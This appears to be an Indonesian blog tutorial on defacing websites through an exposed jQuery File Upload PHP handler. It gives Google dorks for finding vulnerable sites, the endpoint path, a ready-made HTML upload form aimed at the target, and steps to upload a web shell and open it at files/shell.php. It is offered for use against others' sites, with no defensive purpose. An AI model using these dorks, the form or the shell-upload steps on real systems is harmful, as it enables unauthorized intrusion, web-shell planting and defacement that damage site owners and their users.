Tutorial Deface Dengan Jquery File Upload Vulnerability

Tutorial Deface Dengan Jquery File Upload Vulnerability

12:19 AM
Kali Ini saya Mau Membagikan Tutorial Deface Dengan Exploits Jquery File Upload Vulnerability, Kayaknya Bug Terbaru Atau Saya yang ketinggalan . wkwkwkw

Langsung saja no bacot no curhat.

Dork:
Inurl:/assets/global/plugins/jquery-file-upload/
Inurl:/jquery-file-upload/server/php/ intext:{"files":[]}
Inurl:/assets/global/plugins/jquery-file-upload/ intext:index of
Lanjutnya kembangin sendiri. Biar Gak Manja :)

Exploits:
http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/


Jika Vuln Akan tampak seperti dibawah ini

Tutorial Deface Dengan Exploits Jquery File Upload Vulnerability




Next
Simpan Kode dibawah ini dengan format .html , Save as tipe "All File"




 <form method="POST" action="http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>


Jangan Lupa http://www.target.com ganti dengan target kalian.
Jika sudah buka file tadi lalu upload shell kalian.
Akses shell kalian di http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/files/shell.php



About

This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.

Next
« Prev Post
Previous
Next Post »
Post a Comment
Thanks for your comment
Subscribe to: Post Comments (Atom)